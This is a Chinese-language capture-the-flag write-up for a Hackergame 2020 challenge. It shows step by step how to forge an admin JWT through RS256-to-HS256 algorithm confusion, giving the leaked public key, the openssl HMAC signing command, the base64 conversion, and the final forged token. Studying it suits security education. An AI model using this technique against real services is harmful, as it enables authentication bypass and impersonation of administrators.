Hackergame 2020

0x01 普通的身份认证器（JWT伪造）

登入网站发现只能使用Guest用户登录，需要是admin才能获取flag

抓包发现存在jwt，在burp suite的http历史中搜索jwt版本

#网址安全的JWT版本
eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9._-]*

#所有JWT版本（误报的可能性更高）
eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*

得到结果发现jwt版本存在漏洞抓包token在 https://jwt.io/ 上分析，发现加密方法为RS256，尝试采用HS256的欺骗攻击

首先需要取得公钥

用dirsearch进行站点扫描，发现debug、docs和static三个网址

发现docs站点有回显，进入发现可以手动post token，而后向/debug站点post数据获得公钥

-----BEGIN RSA PUBLIC KEY-----
MIICCgKCAgEAn/KiHQ+/zwE7kY/Xf89PY6SowSb7CUk2b+lSVqC9u+R4BaE/5tNF
eNlneGNny6fQhCRA+Pdw1UJSnNpG26z/uOK8+H7fMb2Da5t/94wavw410sCKVbvf
ft8gKquUaeq//tp20BETeS5MWIXp5EXCE+lEdAHgmWWoMVMIOXwaKTMnCVGJ2SRr
+xH9147FZqOa/17PYIIHuUDlfeGi+Iu7T6a+QZ0tvmHL6j9Onk/EEONuUDfElonY
M688jhuAM/FSLfMzdyk23mJk3CKPah48nzVmb1YRyfBWiVFGYQqMCBnWgoGOanpd
46Fp1ff1zBn4sZTfPSOus/+00D5Lxh6bsbRa6A1vAApfmTcu026lIb7gbG7DU1/s
eDId9s1qA5BJpzWFKO4ztkPGvPTUok8hQBMDaSH1JOoFQgfJIfC7w2CQe+KbodQL
3akKQDCZhcoA4tf5VC6ODJpFxCn6blML5cD6veOBPJiIk8DBRgmt2AHzOUju+5ns
QcplOVxW5TFYxLqeJ8FPWqQcVekZ749FjchtAwPlUsoWIH0PTSun38ua8usrwTXb
pBlf4r0wz22FPqaecvp7z6Rj/xfDauDGDSU4hmn/TY9Fr+OmFJPW/9k2RAv7KEFv
FCLP/3U3r0FMwSe/FPHmt5fjAtsGlZLj+bZsgwFllYeD90VQU8Ds+KkCAwEAAQ==
-----END RSA PUBLIC KEY-----

用指令：

cat pubkey.pem | xxd -p | tr -d "\\n"

将公钥转化为ascii码：

2d2d2d2d2d424547494e20525341205055424c4943204b45592d2d2d2d2d0a4d49494343674b43416745416e2f4b6948512b2f7a7745376b592f58663839505936536f7753623743556b32622b6c5356714339752b52344261452f35744e460a654e6c6e65474e6e79366651684352412b50647731554a536e4e704732367a2f754f4b382b4837664d6232446135742f39347761767734313073434b566276660a667438674b7175556165712f2f747032304245546553354d5749587035455843452b6c45644148676d57576f4d564d494f5877614b544d6e4356474a325352720a2b784839313437465a714f612f313750594949487555446c666547692b4975375436612b515a3074766d484c366a394f6e6b2f45454f4e75554466456c6f6e590a4d3638386a6875414d2f46534c664d7a64796b32336d4a6b33434b50616834386e7a566d6231595279664257695646475951714d43426e57676f474f616e70640a34364670316666317a426e34735a546650534f75732f2b303044354c786836627362526136413176414170666d5463753032366c496237676247374455312f730a65444964397331714135424a707a57464b4f347a746b5047765054556f6b386851424d44615348314a4f6f465167664a4966433777324351652b4b626f64514c0a33616b4b5144435a68636f41347466355643364f444a704678436e36626c4d4c3563443676654f42504a69496b38444252676d743241487a4f556a752b356e730a5163706c4f56785735544659784c71654a3846505771516356656b5a373439466a6368744177506c55736f57494830505453756e3338756138757372775458620a70426c66347230777a32324650716165637670377a36526a2f7866446175444744535534686d6e2f54593946722b4f6d464a50572f396b32524176374b4546760a46434c502f3355337230464d7753652f4650486d7435666a417473476c5a4c6a2b625a736777466c6c59654439305651553844732b4b6b434177454141513d3d0a2d2d2d2d2d454e4420525341205055424c4943204b45592d2d2d2d2d

而后使用：

echo -n "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTYwNDc2MTg5Nn0" | openssl dgst -sha256 -mac HMAC -macopt hexkey:2d2d2d2d2d424547494e20525341205055424c4943204b45592d2d2d2d2d0a4d49494343674b43416745416e2f4b6948512b2f7a7745376b592f58663839505936536f7753623743556b32622b6c5356714339752b52344261452f35744e460a654e6c6e65474e6e79366651684352412b50647731554a536e4e704732367a2f754f4b382b4837664d6232446135742f39347761767734313073434b566276660a667438674b7175556165712f2f747032304245546553354d5749587035455843452b6c45644148676d57576f4d564d494f5877614b544d6e4356474a325352720a2b784839313437465a714f612f313750594949487555446c666547692b4975375436612b515a3074766d484c366a394f6e6b2f45454f4e75554466456c6f6e590a4d3638386a6875414d2f46534c664d7a64796b32336d4a6b33434b50616834386e7a566d6231595279664257695646475951714d43426e57676f474f616e70640a34364670316666317a426e34735a546650534f75732f2b303044354c786836627362526136413176414170666d5463753032366c496237676247374455312f730a65444964397331714135424a707a57464b4f347a746b5047765054556f6b386851424d44615348314a4f6f465167664a4966433777324351652b4b626f64514c0a33616b4b5144435a68636f41347466355643364f444a704678436e36626c4d4c3563443676654f42504a69496b38444252676d743241487a4f556a752b356e730a5163706c4f56785735544659784c71654a3846505771516356656b5a373439466a6368744177506c55736f57494830505453756e3338756138757372775458620a70426c66347230777a32324650716165637670377a36526a2f7866446175444744535534686d6e2f54593946722b4f6d464a50572f396b32524176374b4546760a46434c502f3355337230464d7753652f4650486d7435666a417473476c5a4c6a2b625a736777466c6c59654439305651553844732b4b6b434177454141513d3d0a2d2d2d2d2d454e4420525341205055424c4943204b45592d2d2d2d2d

获得签名字符串：

cc8f2df0816eba134becfa7bec36726d4bc604d11cc71b400c4ddf4f0514c652

再使用：

python -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('cc8f2df0816eba134becfa7bec36726d4bc604d11cc71b400c4ddf4f0514c652')).replace('=','')\")"

获取加密后的base64码组成最后一段签名

完整JWT签名：

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTYwNDc2MTg5Nn0.zI8t8IFuuhNL7Pp77DZybUvGBNEcxxtADE3fTwUUxlI

包含信息：

{
  "typ": "JWT",
  "alg": "HS256"
}
{
  "sub": "admin",
  "exp": 1604761896
}
signature

抓包更改jwt，欺骗成功获取flag